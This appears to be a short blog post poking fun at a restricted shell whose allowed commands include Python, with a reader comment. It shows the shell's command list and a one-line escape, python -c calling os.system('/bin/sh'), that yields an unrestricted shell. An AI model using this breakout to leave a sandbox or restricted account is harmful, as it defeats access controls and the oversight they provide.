Picket Fence

Here’s a tip: if you’re going to confine users inside a severely restricted shell where only a tiny handful of commands are allowed, making one of those approved commands the Python interpreter sort of defeats the purpose.


When you log into picket, you can only use a limited number of commands.
Type "commands" to see a complete list of available commands.


commands        output a brief list of all available commands
help            display a list of commands with description
logout          exit this program
passwd          change your file server password
quota           check your quota or disk usage
scp             secure copy
sftp            secure ftp server (only for connecting TO this host from another host)
webfix          fixes permissions in an existing www directory


fsh> commands
bye                 cd                  chgrp               chmod
commands            du                  exit                help
logout              ls                  mailbox             man
passwd              pwd                 python              quit
quota               rdistd              rm                  rmfile
scp                 sftp                source              webfix
/opt/ssh/libexec/sftp-server ?                 
fsh> python -c 'import os; os.system("/bin/sh")'
$

One Response

  1. Most excellent. This kind of thing always puts a smile on my face.

    Brings back to mind the words of a Security professor I once had who said “The most important way to secure your computers is through equal parts paranoia and common sense.”

    Oh well. They got one out of two, and that ain’t bad.

Comments are closed.